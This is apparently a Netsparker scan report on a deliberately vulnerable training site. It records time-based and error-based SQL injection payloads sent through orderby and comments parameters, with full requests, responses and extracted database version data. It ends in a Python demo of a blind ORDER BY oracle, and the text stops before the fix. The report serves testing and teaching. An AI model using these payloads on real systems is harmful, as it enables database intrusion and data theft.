GET /Supercar/Leaderboard?orderBy=1+WAITFOR+DELAY+%270%3a0%3a25%27--&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:16:09 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2885
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Supercar Leaderboard - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.3 /Make/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters:
Parameter  Type  Value
orderby    GET   1 WAITFOR DELAY '0:0:25'--
Request:
GET /Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:06:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Paganis - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.4 /Make/2 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters:
Parameter  Type  Value
orderby    GET   1 WAITFOR DELAY '0:0:25'--
Request:
GET /Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:03:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>McLarens - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.5 /api/vote CONFIRMED http://hackyourselffirst.troyhunt.com/api/vote
Parameters:
Parameter   Type   Value
userId      POST   1
supercarId  POST   3
comments    POST   ') WAITFOR DELAY '0:0:25'--
Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 68
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27)+WAITFOR+DELAY+%270%3a0%3a25%27--
Response:
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:21:22 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1
5 TOTAL (CRITICAL), 5 CONFIRMED
2 SQL Injection
Netsparker identified an SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database.
Impact: Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following types of attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system
Actions to Take:
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.
Remedy: A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation: There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.
External References: OWASP SQL injection; SQL injection Cheat sheet
Remedy References: MSDN - Protect From SQL injection in ASP.NET
Classification: OWASP 2010-A1, OWASP 2013-A1, PCI V2.0-6.5.1, PCI V3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
2.1 /api/vote CONFIRMED http://hackyourselffirst.troyhunt.com/api/vote
Parameters:
Parameter   Type   Value
userId      POST   1
supercarId  POST   3
comments    POST   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+C
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 \n\taug 20 2014 22:37:56 \n\tcopyright (c) microsoft corporation\n
Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 209
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27%2b+(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)+%2b%27
Response:
…PNET
Content-Length: 2867
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Conversion failed when converting the varchar value '_!@2dilemma' to data type int.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrap…
2.2 /Supercar/Leaderboard CONFIRMED http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2b
Parameters:
Parameter  Type  Value
orderBy    GET   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
asc        GET   false
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14292
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.3 /Make/2 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter  Type  Value
orderby    GET   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.4 /Make/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter  Type  Value
orderby    GET   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.5 /Make/1 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA

Parameters
Parameter  Type  Value
orderby    GET   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR

Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>

Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
    <head>
        <title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
        <meta name="viewport" content="width=device-width" />
        <style>
         body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
            <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
            <h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
            <b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
            <br><br>
            <b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
            <b>Source Error:</b> <br><br>
            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code>
…e width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
            </font>
    </body>
</html>
<!-- 
[SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
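Both confirmations above inject through the orderby query-string parameter. An ORDER BY clause names a column or expression, so it cannot be bound as a query parameter; the fix is to map the user's value onto a server-defined sort order instead of concatenating it. The script below is an added example, not code from this report or from the Hack Yourself First site: the Supercar table, its rows and the function names are constructed for illustration. SQLite has no convert(int, ...) error trick, so the probe here infers a condition from the resulting row order, which is the technique behind the report's blind ORDER BY injections; the error-based variant only adds a faster channel on top of the same flaw.

```python
import sqlite3

# Constructed stand-in for the Supercar table behind /Make/{id}?orderby=...
ROWS = [(1, "Nissan GT-R", 40), (2, "Lamborghini Aventador", 5), (3, "Ferrari 458", 90)]


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Supercar (Id INTEGER, Name TEXT, Votes INTEGER)")
    conn.executemany("INSERT INTO Supercar VALUES (?, ?, ?)", ROWS)
    return conn


def list_ids_vulnerable(orderby):
    """Mirrors the flaw: the orderby value is concatenated straight into the SQL."""
    conn = _connect()
    sql = f"SELECT Id FROM Supercar ORDER BY {orderby}"  # attacker controls the clause
    return [row[0] for row in conn.execute(sql)]


def order_oracle(condition):
    """Blind probe: sort by Name when `condition` holds, otherwise by Votes.

    The attacker learns one bit per request from the order of the rows; no
    error message is needed, so hiding the yellow screen of death is not a fix.
    """
    return f"(CASE WHEN ({condition}) THEN Name ELSE Votes END)"


# Server-side allow-list: the only sort orders the application supports.
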